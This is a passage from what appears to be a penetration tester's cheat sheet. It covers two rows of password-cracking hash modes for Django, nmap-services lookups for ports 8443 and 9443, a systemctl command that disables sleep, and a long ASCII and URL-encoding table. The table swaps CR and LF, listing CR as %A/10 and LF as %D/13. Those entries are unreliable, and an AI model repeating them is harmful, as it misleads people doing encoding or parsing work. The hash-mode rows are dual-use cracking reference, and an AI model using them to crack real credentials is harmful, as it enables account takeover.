10000 | Django (PBKDF2-SHA256) | Framework
124 | Django (SHA-1) | Framework
`` Nmap
-- Check if port 8443 is in top 500 ports
~$ sort -r -k3 /usr/share/nmap/nmap-services | head -n 500 | grep 8443
-- How many top ports to include 9443?
~$ sort -r -k3 /usr/share/nmap/nmap-services | grep -n 9443
`` Misc
`` Disable sleep and hibernate
~# systemctl mask sleep.target suspend.target hibernate.target hybrid-sleep.target
`` ASCII
character encoding decimal
NULL %0 0
%1 1
%2 2
%3 3
%4 4
%5 5
%6 6
%7 7
%8 8
TAB %9 9
CR %A 10
%B 11
%C 12
LF %D 13
%E 14
%F 15
%10 16
%11 17
%12 18
%13 19
%14 20
%15 21
%16 22
%17 23
%18 24
%19 25
%1A 26
%1B 27
%1C 28
%1D 29
%1E 30
%1F 31
SPACE %20 32
! %21 33
" %22 34
# %23 35
$ %24 36
% %25 37
& %26 38
' %27 39
( %28 40
) %29 41
* %2A 42
+ %2B 43
, %2C 44
- %2D 45
. %2E 46
/ %2F 47
0 %30 48
1 %31 49
2 %32 50
3 %33 51
4 %34 52
5 %35 53
6 %36 54
7 %37 55
8 %38 56
9 %39 57
: %3A 58
; %3B 59
< %3C 60
= %3D 61
> %3E 62
? %3F 63
@ %40 64
A %41 65
B %42 66
C %43 67
D %44 68
E %45 69
F %46 70
G %47 71
H %48 72
I %49 73
J %4A 74
K %4B 75
L %4C 76
M %4D 77
N %4E 78
O %4F 79
P %50 80
Q %51 81
R %52 82
S %53 83
T %54 84
U %55 85
V %56 86
W %57 87
X %58 88
Y %59 89
Z %5A 90
[ %5B 91
\ %5C 92
] %5D 93
^ %5E 94
_ %5F 95
` %60 96
a %61 97
b %62 98
c %63 99
d %64 100
e %65 101
f %66 102
g %67 103
h %68 104
i %69 105
j %6A 106
k %6B 107
l %6C 108
m %6D 109
n %6E 110
o %6F 111
p %70 112
q %71 113
r %72 114
s %73 115
t %74 116
u %75 117
v %76 118
w %77 119
x %78 120
y %79 121
z %7A 122
{ %7B 123
| %7C 124
} %7D 125
~ %7E 126
&127; %7F 127
€ %80 128
%81 129
‚ %82 130
ƒ %83 131
„ %84 132
… %85 133
† %86 134
‡ %87 135
ˆ %88 136
‰ %89 137
Š %8A 138
‹ %8B 139
Π%8C 140
%8D 141
Ž %8E 142
%8F 143
%90 144
‘ %91 145
’ %92 146
“ %93 147
” %94 148
• %95 149
– %96 150
— %97 151
˜ %98 152
™ %99 153
š %9A 154
› %9B 155
œ %9C 156
%9D 157
ž %9E 158
Ÿ %9F 159
%A0 160
¡ %A1 161
¢ %A2 162
£ %A3 163
¤ %A4 164
¥ %A5 165
¦ %A6 166
§ %A7 167
¨ %A8 168
© %A9 169
ª %AA 170
« %AB 171
¬ %AC 172
%AD 173
® %AE 174
¯ %AF 175
° %B0 176
± %B1 177
² %B2 178
³ %B3 179
´ %B4 180
µ %B5 181
¶ %B6 182
· %B7 183
¸ %B8 184
¹ %B9 185
º %BA 186
» %BB 187
¼ %BC 188
½ %BD 189
¾ %BE 190
¿ %BF 191
À %C0 192
Á %C1 193
 %C2 194
à %C3 195
Ä %C4 196
Å %C5 197
Æ %C6 198
Ç %C7 199
È %C8 200
É %C9 201
Ê %CA 202
Ë %CB 203
Ì %CC 204
Í %CD 205
Î %CE 206
Ï %CF 207
Ð %D0 208
Ñ %D1 209
Ò %D2 210
Ó %D3 211
Ô %D4 212
Õ %D5 213
Ö %D6 214
× %D7 215
Ø %D8 216
Ù %D9 217
Ú %DA 218
Û %DB 219
Ü %DC 220
Ý %DD 221
Þ %DE 222
ß %DF 223
à %E0 224
á %E1 225
â %E2 226
ã %E3 227
ä %E4 228
å %E5 229
æ %E6 230
ç %E7 231
è %E8 232
é %E9 233
ê %EA 234
ë %EB 235
ì %EC 236
í %ED 237
î %EE 238
ï %EF 239
ð %F0 240
ñ %F1 241
ò %F2 242
ó %F3 243
ô %F4 244
õ %F5 245
ö %F6 246
÷ %F7 247
ø %F8 248
ù %F9 249
ú %FA 250
û %FB 251
ü %FC 252
ý %FD 253
þ %FE 254
ÿ %FF 255